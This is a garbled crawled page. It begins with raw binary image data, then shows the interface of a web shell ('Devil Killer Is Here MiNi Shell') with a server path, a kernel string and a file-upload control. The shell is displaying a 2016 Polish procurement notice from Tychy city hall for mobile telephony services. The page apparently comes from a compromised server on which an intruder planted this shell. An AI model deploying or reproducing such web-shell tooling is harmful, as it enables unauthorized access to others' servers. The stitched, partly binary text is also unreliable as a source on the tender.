JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161201/356302-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://https://bip.umtychy.pl/zamowienia-publiczne-urzedu-miasta' target='_blank'>http://https://bip.umtychy.pl/zamowienia-publiczne-urzedu-miasta</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 356302 - 2016
              z dnia 2016-12-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Tychy: Świadczenie usług telefonii komórkowej wraz z dostawą fabrycznie nowych telefonów komórkowych dla Urzędu Miasta i jednostek organizacyjnych miasta Tychy<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                tak
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br />AUKSO Orkiestra Kameralna Miasta Tychy	Tychy	al.Marszałka Piłsudskiego 16,
                <br />Gimnazjum nr 1  im. Armii Krajowej	Tychy	Brzozowa 24,
                <br />Gimnazjum nr 11   im. Jana III Sobieskiego	Tychy	Al. Niepodległości 108,
                <br />Gimnazjum nr 3   im. Jana Pawła II	Tychy	Borowa 123,
                <br />Gimnazjum nr 4  im. Kardynała Stefana Wyszyńskiego	Tychy	Konecznego 1,
                <br />I Liceum Ogólnokształcące  im. Leona Kruczkowskiego	Tychy	Korczaka 6,
                <br />II Liceum Ogólnokształcące  z Oddziałami Integracyjnymi im. Cypriana Kamila Norwida	Tychy	Norwida 40,
                <br />III Liceum Ogólnokształcące  im. Stanisława Wyspiańskiego	Tychy	Elfów 62,
                <br />Master - Odpady i Energia Sp. z o.o.	Tychy	Lokalna 11,
                <br />Miejski Ośrodek Pomocy Społecznej w Tychach	Tychy	Budowlanych 59,
                <br />Miejski Ośrodek Sportu i Rekreacji  	Tychy	Al.Piłsudskiego 12,
                <br />Miejski Zarząd Budynków Mieszkalnych	Tychy	Filaretów 31,
                <br />Miejski Zarząd Komunikacji w Tychach	Tychy	al.Marszałka Piłsudskiego 12,
                <br />Miejski Zarząd Ulic i Mostów	Tychy	Budowlanych 59,
                <br />Miejskie Centrum Kultury	Tychy	Bohaterów Warszawy 26,
                <br />Miejskie Centrum Oświaty w Tychy	Tychy	al.Marszałka Piłsudskiego 12,
                <br />Młodzieżowy Dom Kultury nr 1  im. Artystów Rodu Kossaków	Tychy	Kardynała Hlonda 1,
                <br />Muzeum Miejskie w Tychach 	Tychy	plac Wolności 1,
                <br />PKM Tychy Sp. Z o.o.	Tychy	Towarowa 1,
                <br />Placówka Pieczy Zastępczej "Kwadrat"	Tychy	Budowlanych 59,
                <br />Poradnia Psychologiczno Pedagogiczna	Tychy	Gen. Andersa 16,
                <br />Powiatowy Urząd Pracy	Tychy	Budowlanych 59,
                <br />Przedsiębiorstwo Energetyki Cieplnej Sp. z o.o.	Tychy	Kubicy 6,
                <br />Przedszkole nr 1	Tychy	Myśliwska 102,
                <br />Przedszkole nr 21	Tychy	Zelwerowicza 21,
                <br />Przedszkole nr 22	Tychy	Dąbrowskiego 85,
                <br />Przedszkole nr 6	Tychy	Konecznego 1,
                <br />Przedszkole nr 8  "Zielony Ogród" z oddziałami integracyjnymi	Tychy	Wojska Polskiego 2,
                <br />REGIONALNE CENTRUM GOSPODARKI WODNO-ŚCIEKOWEJ S.A.	Tychy	al. marsz. Piłsudskiego 12,
                <br />Rejonowe Przedsiębiorstwo Wodociągów i Kanalizacji w Tychach SA	Tychy	Sadowa 4,
                <br />Szkoła Podstawowa nr 1  im. Rudolfa Zaręby	Tychy	Plac Wolności 4,
                <br />Szkoła Podstawowa nr 10  im. Gustawa Morcinka	Tychy	Borowa 123,
                <br />Szkoła Podstawowa nr 11  im. Marii Curie Skłodowskiej	Tychy	Marii Curie Słodowskiej 4,
                <br />Szkoła Podstawowa nr 17	Tychy	Begonii 5,
                <br />Szkoła Podstawowa nr 18  im. Władysława Jagiełły	Tychy	Fitelberga 8,
                <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b>ciąg dalszy Zamawiających:
- SP nr 22  z Oddziałami Integracyjnymi;
- SP nr 3 Tychy;
- SP nr 35  z Oddziałami Integracyjnymi;
- SP nr 36  im. Narodów Zjednoczonej Europy Tychy;
- SP nr 37  im. Kornela Makuszyńskiego Tychy;
- SP nr 6  im. ks. Karola Palicy Tychy;
- SP nr 7  im. Powstańców Śląskich Tychy;
- Śródmieście Spółka z o.o.Tychy;
- Teatr Mały Tychy;
- Tyski Sport S. A. Tychy;
- Tyski Zakład Usług Komunalnych Tychy;
- Tyskie Linie Trolejbusowe Tychy;
- Tyskie TBS Sp. z o.o.	Tychy;
- Urząd Miasta Tychy;
- Zespół Szkolno-Przedszkolny nr 1 Tychy;
- Zespół Szkolno-Przedszkolny nr 3 Tychy;
- Zespół Szkół nr 1 im. Gustawa Morcinka Tychy;
- Zespół Szkół nr 4 im. J. Groszkowskiego Tychy;
- Zespół Szkół nr 5 Tychy;
- Zespół Szkół nr 6 Tychy;
- Zespół Szkół nr 7 Tychy;
- Zespół Szkół nr 9 Tychy;
- Zespół Szkół Specjalnych 8 Tychy;
- Zespół Szkół Sportowych Tychy;
- Zespół Szkół z Oddziałami Integracyjnymi Tychy;
- Żłobek Miejski w Tychach Tychy.
<br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Prezydent Miasta Tychy, krajowy numer identyfikacyjny
              51592200000, ul.
              Al. Niepodległości 
              49,
              43100  
              Tychy, woj.
              śląskie, państwo
              Polska, tel.
              (032) 7763333, e-mail
              poczta@umtychy.pl, faks
              (032) 7763344.
              <br />
              Adres strony internetowej (URL): http://umtychy.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />Prezydent Miasta Tychy na podstawie Zarządzenia nr 0050/401/16 z dnia 21 listopada 2016 r. wyznaczył Urząd Miasta Tychy zamawiającym, upoważnionym do przeprowadzenia wspólnego postępowania pn.: Świadczenie usług telefonii komórkowej wraz z dostawą fabrycznie nowych telefonów komórkowych dla Urzędu Miasta i jednostek organizacyjnych miasta Tychy i udzielenia zamówienia w imieniu własnym oraz w imieniu i na rzecz jednostek organizacyjnych Gminy Tychy wymienionych w załączniku nr 1a do SIWZ.</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />https://bip.umtychy.pl/zamowienia-publiczne-urzedu-miasta</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />https://bip.umtychy.pl/zamowienia-publiczne-urzedu-miasta</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferty należy składać pisemnie<br />
                Adres:
                <br />Urząd Miasta Tychy Wydział Zamówień Publicznych pok. nr 808, Al. Niepodległości 49, 43-100 Tychy</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług telefonii komórkowej wraz z dostawą fabrycznie nowych telefonów komórkowych dla Urzędu Miasta i jednostek organizacyjnych miasta Tychy<br /><b>Numer referencyjny: </b>PZP.27.47.2016.AW<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  tak
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest świadczenie usług telefonii komórkowej wraz z dostawą fabrycznie nowych telefonów komórkowych dla Urzędu Miasta i jednostek organizacyjnych miasta Tychy. 

Przedmiotem zamówienia jest świadczenie usług telefonii komórkowej, w tym:
	świadczenie usługi łączności głosowej,
	świadczenie usługi obustronnej transmisji danych,
	świadczenie usługi mobilnego dostępu do Internetu 
	dostawa aktywnych kart SIM skonfigurowanych do pracy w sieci Wykonawcy.

oraz dostawa aparatów telefonicznych i modemów.

2. Świadczone usługi telekomunikacyjne mają zapewnić między innymi:
	przejęcie aktualnie wykorzystywanych numerów telefonicznych, w trybie określonym przez Prawo Telekomunikacyjne,
	uruchomienie nowych aktywacji,
	łączność głosową, tekstową SMS i MMS oraz mobilny dostęp do Internetu.

3. Zamawiający przewiduje przeniesienie poszczególnych, obecnie posiadanych numerów użytkowników do sieci wybranego w postępowaniu operatora po zakończeniu realizacji dotychczasowej umowy podstawowej i uzupełniającej oraz wygaśnięciu wynikających z nich zobowiązań, z zastrzeżeniem, iż wybrany Wykonawca zobowiązany będzie wykonać wszystkie czynności techniczne i formalne, zmierzające do skutecznego przejęcia numeracji i rozpoczęcia świadczenia usług telekomunikacyjnych w wymaganym terminie, jeszcze w trakcie realizacji aktualnie obowiązujących umów.

4. Ilości aktywacji kart planowanych do uruchomienia, wraz z harmonogramem zostały określone, w załączniku nr 1c do SIWZ  Harmonogram.

5. Przedmiot zamówienia realizowany będzie na podstawie:
	umów, zawartych w wyniku przeprowadzenia niniejszego postępowania o udzielenie zamówienia publicznego, pomiędzy Urzędem Miasta i jednostkami organizacyjnymi Gminy. Wzór umowy dostarcza Wykonawca i uwzględnia w nim zapisy opisane w załączniku nr 3 do SIWZ  Istotne postanowienia do umowy. Umowa o świadczenie usług telekomunikacyjnych zawierać będzie co najmniej dane wskazane w art. 56 ustawy z dnia 16 lipca 2004r. Prawo telekomunikacyjne (Dz.U. 2016 nr 0 poz. 1489);
	Regulaminu świadczenia usług telekomunikacyjnych Wykonawcy; 
	Cennika biznesowego usług Wykonawcy dla usług nieopisanych w załączniku cenowym na życzenie Zamawiającego objętych podstępowaniem;
	Przepisów ustawy Prawo Zamówień Publicznych;
	Kodeksu cywilnego.

6. Wykonawca jest zobowiązany świadczyć usługi na poziomie umożliwiającym realizację usług głosowych jak i transmisji danych na terenie kraju.
W celu weryfikacji jakości świadczonych usług Wykonawca na wezwanie Zamawiającego zobowiązany będzie wykonać pomiary zasięgu w wyznaczonych punktach :

punkt A: Master - Odpady i Energia Sp. z o.o. 43-100 Tychy, ul. Lokalna 11  hala główna;
punkt B: Master - Odpady i Energia Sp. z o.o. 43-100 Tychy, ul. Lokalna 11  pomieszczenia biurowe;
punkt C: Tyski Sport S. A. 43-100 Tychy, ul. Edukacji 7  pomieszczenia biurowe
punkt D: Urząd Miast Tychy, 43-100 Tychy, al. Niepodległości 49  pomieszczenia biurowe

W punktach A do D Zamawiający wymaga sygnału 2G na poziomie nie gorszym niż -105dBm, od pierwszego dnia obowiązywania umowy przez cały jej okres Wykonawca zapewni utrzymanie paramentów świadczenie usług określonych w punktach A do D.


Szczegółowy opis przedmiotu zamówienia stanowi  załącznik nr 1b do SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>64210000-1<br /><b> Dodatkowe kody CPV:</b>64212000-5,
                64212100-6,
                64212300-8,
                32250000-0,
                32552410-4,
                31712112-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwości udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6.
Zakres zamówienia obejmuje powtórzenie do 30 % wartości zamówienia podstawowego usług polegających na świadczeniu usług telefonii komórkowej, w tym:
- świadczenie usługi łączności głosowej,
- świadczenie usługi obustronnej transmisji danych,
- świadczenie usługi mobilnego dostępu do Internetu 
- dostawa aktywnych kart SIM skonfigurowanych do pracy w sieci Wykonawcy
- oraz dostawa aparatów telefonicznych i modemów.
Warunkiem udzielenia niniejszego zamówienia, będzie przeprowadzenie negocjacji z wybranym wykonawcą.
Warunki na jakich zostanie udzielone powyższe zamówienie Zamawiający określi odnośnie do warunków dotyczących kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów  zgodnie z zamówieniem podstawowym.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamówienie musi zostać zrealizowane: od dnia podpisania umowy, jednak nie wcześniej niż od 01.01.2017 r. do 31.12.2018 r. z uwzględnieniem terminów pośrednich, które zostały wskazane w harmonogramie.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Warunek zostanie uznany za spełniony, jeżeli Wykonawca przedłoży aktualne zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z ustawą Prawo telekomunikacyjne.<br />
                Informacje dodatkowe
                Przed podpisaniem umowy Wykonawca zobowiązany jest do przedstawienia w/w dokumentu.
Brak przedłożenia w/w dokumentów stanowić będzie podstawę do uznania, iż wykonawca uchyla się od podpisania umowy oraz do zatrzymania wadium.
<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1. W celu potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają wymaganiom określonym przez zamawiającego, zamawiający żąda następujących dokumentów:
-próbek, opisów, fotografii, planów, projektów, rysunków, modeli, wzorów, programów komputerowych oraz innych materiałów, których autentyczność musi zostać potwierdzona przez wykonawcę na żądanie zamawiającego; 
2. Wykonawca, celem potwierdzenia spełniania wymogu określonego w punkcie 1. zobowiązany będzie do:
a) przeprowadzenia pomiarów mocy sygnałów:
W celu weryfikacji jakości świadczonych usług Wykonawca jest zobowiązany na swój koszt wykonać pomiary zasięgu w wyznaczonych punktach :
punkt A: Master - Odpady i Energia Sp. z o.o. 43-100 Tychy, ul. Lokalna 11  hala główna;
punkt B: Master - Odpady i Energia Sp. z o.o. 43-100 Tychy, ul. Lokalna 11  pomieszczenia biurowe;
punkt C: Tyski Sport S. A. 43-100 Tychy, ul. Edukacji 7  pomieszczenia biurowe
punkt D: Urząd Miast Tychy, 43-100 Tychy, al. Niepodległości 49  pomieszczenia biurowe
W punktach A do D Zamawiający wymaga sygnału 2G na poziomie nie gorszym niż -105dBm, od pierwszego dnia obowiązywania umowy przez cały jej okres Wykonawca zapewni utrzymanie paramentów świadczenie usług określonych w punktach A do D.
Pomiary zostaną przeprowadzone w w/w miejscach w tym samym dniu. Zamawiający zawiadomi o terminie pomiarów. Pomiary zostaną przeprowadzone w obecności 2 członków komisji przetargowej a ich rezultat zostanie potwierdzony w protokole którego wzór stanowi załącznik nr 4 do SIWZ. 
Urządzenie z którego dokonany będzie pomiar dostarczy Zamawiający, po stronie Wykonawcy jest dostarczenie karty SIM. Pomiar wykonawcy, którego sygnał nie spełni wymagań, określonych w  SIWZ spowoduje że oferta zostanie odrzucona.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
